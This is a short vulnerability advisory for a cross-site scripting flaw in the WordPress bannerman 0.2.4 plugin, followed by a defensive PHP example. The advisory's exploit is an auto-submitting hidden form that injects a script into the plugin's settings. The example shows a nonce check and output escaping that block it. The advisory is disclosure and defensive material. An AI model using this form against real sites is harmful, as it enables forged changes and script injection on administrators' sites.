######################
# Exploit Title : WordPress bannerman 0.2.4 Cross Site Scripting

# Exploit Author : Ashiyane Digital Security Team

# Vendor Homepage : http://wordpress.org/plugins/bannerman/

# Software Link : http://downloads.wordpress.org/plugin/bannerman.0.2.4.zip

# Date : 2014-06-27

# Tested on : Windows 7 / Mozilla Firefox
######################

# Location : http://localhost/wp-admin/options-general.php?page=bannerman

######################

Exploit Code:

<html>
<body>
<form name="post_form"  
action="http://localhost/wp-admin/options-general.php?page=bannerman"  
method="post">
<input type='hidden' name="bannerman_background"  
id="bannerman_background" value='"/><script>alert(1);</script>'/>
<script language="Javascript">
setTimeout('post_form.submit()', 1);
</script>
</form>
</body>
</html>

#####################

Discovered By : ACC3SS

#####################
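
A defensive counterpart to the proof of concept above, added here as an example and not taken from the plugin or the advisory: a WordPress settings handler that rejects a cross-site auto-submitted POST with a nonce check and escapes the stored value when it is written back into the `value` attribute. Only the field name `bannerman_background` and the page slug `bannerman` come from the advisory; the `bm_example_*` names, the nonce action and the menu title are hypothetical.

```php
<?php
// Added example, not the plugin's own code. Only 'bannerman_background' and the
// page slug 'bannerman' come from the advisory; all bm_example_* names are hypothetical.
const BM_EXAMPLE_NONCE = 'bm_example_save_settings'; // hypothetical nonce action

add_action( 'admin_menu', function () {
    add_options_page( 'BannerMan', 'BannerMan', 'manage_options', 'bannerman', 'bm_example_render_page' );
} );
add_action( 'admin_init', 'bm_example_save_settings' );

function bm_example_save_settings() {
    // Act only on POSTs that carry this page's field.
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] || ! isset( $_POST['bannerman_background'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // A form auto-submitted from another origin cannot supply a valid nonce,
    // so the request dies here before anything is stored.
    check_admin_referer( BM_EXAMPLE_NONCE );

    // Input hygiene: undo WordPress's added slashes, strip tags and control characters.
    $value = sanitize_text_field( wp_unslash( $_POST['bannerman_background'] ) );
    update_option( 'bannerman_background', $value );
}

function bm_example_render_page() {
    $value = get_option( 'bannerman_background', '' );
    ?>
    <div class="wrap">
      <form method="post" action="<?php echo esc_url( admin_url( 'options-general.php?page=bannerman' ) ); ?>">
        <?php wp_nonce_field( BM_EXAMPLE_NONCE ); ?>
        <!-- esc_attr() encodes quotes and angle brackets, so a stored value cannot
             close the value attribute or open a new tag. -->
        <input type="text" name="bannerman_background" id="bannerman_background"
               value="<?php echo esc_attr( $value ); ?>" />
        <?php submit_button(); ?>
      </form>
    </div>
    <?php
}
```

The nonce check and the output escaping are independent controls: the first stops the forged request, the second keeps any value already stored in the option from executing when the settings page renders.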